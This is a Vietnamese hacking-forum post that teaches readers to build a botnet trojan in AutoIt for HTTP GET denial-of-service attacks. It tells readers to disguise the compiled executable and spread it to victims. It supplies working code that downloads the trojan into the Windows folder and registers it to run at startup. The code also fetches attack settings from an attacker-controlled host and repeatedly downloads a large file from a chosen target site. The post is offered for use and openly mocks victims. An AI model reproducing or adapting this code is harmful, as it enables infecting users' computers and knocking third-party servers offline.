Quản trị net diễn đàn chia sẻ thông tin các thủ thuật mạng, internet bảo mật thông tin dành cho giới IT VIệt hy vọng là nơi bổ ích cho cộng đồng

Thực tập DDOS thông qua HTTP GET

Source AutoIT 3

http://www.4shared.com/file/55243733...6f/AutoIT.html

Nếu 1 website bảo mật wá , bạn úynh ko đc nó http://nhatnghe.com/forum/images/smi...g/_biggrin.gif , cũng không đụng đc tới web server của nó thì chúng ta chơi chiêu bài cuối , không ăn được là đạp. http://nhatnghe.com/forum/images/smi...gg/realmad.gif

Tấn công từ chối dịch vụ DOS : Denial Of Service . ko chiếm quyền điều khiển mà mục đích là làm cho dich vụ đối phương cung cấp bị tê liệt .

DDOS : Distribute Denial Of Service : Tấn công từ chối dịch vụ phân tán , sử dụng hệ thống mạng botnet để tấn công .

Botnet : Hệ thống các máy tính zombie bị lây nhiễm các trojan , khi nhận lệnh của ta sẽ đồng loạt tấn công .

Sau đây là 1 cách DDOS thông qua HTTP Get , không ghê gớm lắm nhưng cũng làm đc khối tên ói máu nếu mạng botnet của bạn lớn http://nhatnghe.com/forum/images/smi...g/_biggrin.gif

Download và Cài AutoIT
Tạo file script sau
Compile thành file exe
Tạo 1 website của bạn , upload file exe lên với tên trojan.txt
Nhúng trojan này vào 1 cái gì đó hấp dẫn và quăng toán loạn http://nhatnghe.com/forum/images/smi...g/_biggrin.gif

================================================== =====

Trích dẫn:

$website = "http://yourdomain/"
; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\sysinet.exe") Then
InetGet ($website & "/trojan.txt", @WindowsDir & "\sysinet.exe", 0, 1)
Sleep(5000)
EndIf

Đoạn mã trên để download trojan về máy nạn nhân , và rename lại thành file .exe để có khả năng thực thi. [ tại host free ko cho up exe http://nhatnghe.com/forum/images/smi...g/yahoo%21.gif]

Trích dẫn:

; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\sysinet.exe")

Đoạn trên tạo các giá trị tự động chạy cho trojan sysinet.exe . Disable taskmanager và regedit của đối tượng
Ở đây mình set là 0 vì làm phiền đối tượng nó cáu cài lại máy thì phiền http://nhatnghe.com/forum/images/smi...g/_biggrin.gif . Mình chỉ mượn tay nó đánh phụ thoy , nên tử tế chút http://nhatnghe.com/forum/images/smilies/biggg/ROFL.gif

Trích dẫn:

InetGet ($website & "/setting.txt", @WindowsDir & "\setting.txt", 0, 1)
Sleep(5000)

$taptinmoi = FileOpen(@WindowsDir & "\setting.txt", 0)

$sitetancong = FileReadLine($taptinmoi)
$thoigian = FileReadLine($taptinmoi)

FileClose($taptinmoi)

while(1)

InetGet ($sitetancong, @windowsDir , 0, 1)
sleep($thoigian)
wend

Đoạn này sẽ đọc file settings trên web site của bạn và bắt đầu download dữ liệu từ server về

file setting.txt đặt trên http://yourdomain/
và có nội dụng như sau

dòng 1 : link direct tới file cần download
dòng 2 : thời gian ngủ mỗi lần download
-----------------------------------------------------------------------

ví dụ :
http://abc.com/test.wmv << link direct . file size= 300 mb
300000 << vì file bự , cho ngủ 5 phút .

-----------------------------------------------------------------------
Chỉ cần khoảng vài trăm mạng cùng down bộ phim này thì cái server sẽ ra sao nhỉ http://nhatnghe.com/forum/images/smilies/biggg/bomb.gif

----------------------------------------------------------------------

Bass
----------------------------------------------------------------------
Chúc anh em vọc vui vẻ

:battay: